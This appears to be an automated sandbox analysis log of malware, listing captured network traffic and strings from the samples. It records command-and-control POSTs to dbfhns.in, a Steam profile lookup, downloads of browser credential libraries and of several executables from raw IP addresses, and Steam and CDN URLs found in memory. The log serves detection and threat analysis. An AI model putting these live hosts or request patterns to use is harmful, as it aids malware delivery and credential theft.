Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdtrshdmdsajiin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://depvhlbmmte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://barvntqgmwgcruw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cmmajutpfcykk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrlquvadpwx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmlmhdjgxcsr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhyltqofxhpe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxoumlltphj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etetxpvheghmlur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://spdxbqopubx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxinixbdcjjccvdo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://euirtythbemo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://btndjessgdxlt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfymgppnbopwxnwd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ckgltynaavllsolq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbtkypdfbiu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://haglmiwlgvefe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dnvpkenpnlmca.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvgxhyimdjdqth.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: dbfhns.in
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0CCC60 PR_Recv, 12_2_6D0CCC60
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: dbfhns.in
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ed Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:25:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/
Source: 5876.exe, 00000007.00000003.2014765574.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/N
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1788178535.000000000085D000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014765574.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1760169194.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1746306050.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1760479416.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1788207349.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2058603010.000000000085C000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1772605179.0000000000860000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2087586724.0000000000863000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152636525.0000000000866000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2014729641.000000000085D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v
Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.1406666637.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.dr String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
